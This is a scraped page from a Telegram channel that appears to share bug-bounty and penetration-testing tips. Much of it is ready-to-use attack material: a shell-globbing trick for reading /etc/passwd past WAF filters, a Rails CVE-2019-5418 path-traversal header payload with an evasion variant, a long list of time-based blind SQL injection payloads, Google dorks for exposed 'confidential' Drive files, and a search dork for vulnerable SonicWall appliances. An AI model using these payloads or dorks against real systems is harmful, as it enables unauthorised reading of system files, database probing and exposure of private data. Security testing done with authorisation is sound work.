Brut Security – Telegram
Brut Security
@brutsecurity
14.6K subscribers
901 photos
72 videos
287 files
955 links
Queries: @wtf_brut
🛃WhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
📨E-mail: info@brutsec.com
Download Telegram
About
Blog
Apps
Platform
Join
Brut Security
14.6K subscribers
Brut Security
⚠️Zomato IDOR leakage of Lakhs People Data - Video POC
🔖https://news.1rj.ru/str/brutsecurity_poc/10
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9🔥5
3.7K views
Brut Security
bounty_tips_100+.pdf
18.3 MB
🗿131
3.69K views
Brut Security
⚠️A neat trick for bypassing WAF/filters while testing for OS command injection vulnerabilities.


Use shell globbing / wildcard expansion. Here is an example

cat /e*c/p*s*d is equivalent to cat /etc/passwd. But how?

Before cat runs, the shell expands the glob pattern /e*c/p*s*d to match actual files and directories in the filesystem.

/e*c: The shell interprets this as "any path starting with /e, followed by zero or more characters (*), ending with c."


/p*s*d: This matches a path or file name starting with p, followed by zero or more characters (*), then s, then zero or more characters (*), then d

Credit- Devansh Batham
Please open Telegram to view this post
VIEW IN TELEGRAM
👍19🫡7
4.43K views
Brut Security
Google Dorking for Pentesters.pdf
1.2 MB
19🔥7🤝1
4.3K views
Brut Security
API Bug Bounty.pdf
4.1 MB
API Bug Bounty
32🔥10🫡6👍2
4.33K viewsedited  
Brut Security
Reactions Please 🫠
🔥43👍8🐳65🗿2🤝1
3.15K views
Brut Security
CVE-2025-23006: Deserialization of Untrusted Data in SonicWall SMA1000, 9.8 rating 🔥

A pre-authentication deserialization of untrusted data vulnerability was detected in SMA1000 components, which could allow an attacker to execute OS commands.

Search at Netlas.io:
👉 Link: https://nt.ls/FLFJT
👉 Dork: http.headers.server:"SMA"

Vendor's advisory: https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0002
🔥53👍3
3.41K views
Brut Security
☄️New IDOR POC- https://news.1rj.ru/str/brutsecurity_poc/13
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6
3.1K views
Brut Security
🔖always examine the .js files in the source code, for this I can recommend this simple but effective tool github.com/w9w/JSA from here you can access the endpoints of critical data, the places where backup files are stored and many endpoints.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12👍85
3.36K views
Brut Security
🔖Submaker - Subdomain Wordlist Generator

⬇️https://github.com/llMNMll/Submaker
Please open Telegram to view this post
VIEW IN TELEGRAM
8👍3
3.27K views
Brut Security
⚠️If your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug, it can still be found.

Intercept the request in Burp and replace the Accept header with: Accept: ../../../../../../../../../../etc/passwd{{

🛍If the server is deemed to be vulnerable, but a WAF is present:

../../../../../../e*c/p*s*d{{

✔️Credit- nav1n0x
Please open Telegram to view this post
VIEW IN TELEGRAM
143👍15🔥8🫡4🗿2
3.38K views
Brut Security
Brut Security
⚠️If your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug, it can still be found. Intercept the request in Burp and replace the Accept header with: Accept: ../../../../../../../../../../etc/passwd{{…
Drop Reactions ⚡️⚡️⚡️⚡️⚡️⚡️
Please open Telegram to view this post
VIEW IN TELEGRAM
17👍4🫡4
2.98K views
Brut Security
⚡️Standoff BB Platform- https://dopescope.standoff365.com/
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4🗿3
2.96K viewsedited  
Brut Security
timebased payloads for different dbms:
XOR(if(now()=sysdate(),sleep(7),0))XOR%23
'or sleep(7)--#
'or sleep(7)#
'or sleep(7)='#
'or sleep(7)='--
'/*F*/or/*F*/sleep(7)='
'or sleep(7)--%23
'or sleep(7)%23
'or sleep(7);%00
or sleep(7)--+-
or sleep(7)#
'/*f*/or/*f*/sleep/*f*/(7)--#
'/*f*/or/*f*/sleep/*f*/(7)#
or sleep(7)%23
'/*f*/or/*f*/sleep/*f*/(7)--%23
'/*f*/or/*f*/sleep/*f*/(7)%23
'/*f*/or/*f*/sleep/*f*/(7);%00
or/*f*/sleep/*f*/(7)--+-
or/*f*/sleep/*f*/(7)#
'XOR(if(now()=sysdate(),sleep(7),0))XOR'
'OR(if(now()=sysdate(),sleep(7),0))--#
'OR(if(now()=sysdate(),sleep(7),0))#
or/*f*/sleep/*f*/(7)%23
'OR(if(now()=sysdate(),sleep(7),0))--%23
'OR(if(now()=sysdate(),sleep(7),0))%23
'OR(if(now()=sysdate(),sleep(7),0));%00
OR(if(now()=sysdate(),sleep(7),0))--+-
OR(if(now()=sysdate(),sleep(7),0))#
OR(if(now()=sysdate(),sleep(7),0))%23
'WAITFORDELAY'0:0:7';%00
'WAITFORDELAY'0:0:7'#
'WAITFORDELAY'0:0:7'%23
'WAITFORDELAY'0:0:7';%00
WAITFORDELAY'0:0:7'#
WAITFORDELAY'0:0:7'%23
WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'='
\/*F*/or/*f*/sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7)#
'/*f*/OR/*f*/pg_sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7);%00
/*f*/OR/*f*/pg_sleep(70)--+-
/*f*/OR/*f*/pg_sleep(70)#
/*f*/OR/*f*/pg_sleep(70)%23
'/*f*/OR/*f*/pg_sleep(7)=';%00
\)/*F*/or/*f*/sleep(7)%23
\)/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)--+-
%E2%84%A2\)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2%27)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2'/*F*/or/*f*/sleep(7)='
%E2%84%A2')/*F*/or/*f*/sleep(7)='
28👍13
3.25K views
Brut Security
This media is not supported in your browser
VIEW IN TELEGRAM
For Real Bruh 😭😭😭😭😭
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15🐳2🤨2🗿2😁1
3K viewsedited  
Brut Security
🌟One-Liner - Extract all URLs from the Source Code

curl "testphp.vulnweb.com" | grep -oP '(https*://|www\.)[^ ]*'


🔔@0x0SojalSec
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥243👍3👨‍💻3🫡3
3.49K views
Brut Security
⚠️Google Drive Dorks
site:http://drive.google.com inurl:folder
site:http://drive.google.com inurl:open
site:http://docs.google.com inurl:d
site:http://drive.google.com "confidential"
site:http://docs.google.com inurl:d filetype:docx
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9🔥72
3.25K views
Brut Security
Brut Security
⚠️Google Drive Dorks site:http://drive.google.com inurl:folder site:http://drive.google.com inurl:open site:http://docs.google.com inurl:d site:http://drive.google.com "confidential" site:http://docs.google.com inurl:d filetype:docx
https://hackerone.com/reports/2926447
HackerOne
U.S. Dept Of Defense disclosed on HackerOne: Public google drive...
**Denoscription:**
I found google drive link `https://drive.google.com/drive/folders/ █████████` at `https:// ████████.aspx?Mode=ReadOnly&Id=90dd0d3b-0ed1-e76b-128f-11ebc799ba55` contains pdfs at...
👍41🫡1
3.22K views
Brut Security
vanillacommunities.com Business logic vulnerability POC - https://news.1rj.ru/str/brutsecurity_poc/14
👍5🔥5
3.18K views
Brut Security
☄️IDOR Forge is an advanced and versatile tool designed to detect Insecure Direct Object Reference (IDOR) vulnerabilities in web applications.

🛍https://github.com/errorfiathck/IDOR-Forge
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥176👍4👨‍💻2
3.42K views
Brut Security
Business Logic POC - Able To Unsubscribe User From Company
https://news.1rj.ru/str/brutsecurity_poc/16
11🔥5👍3
3.11K views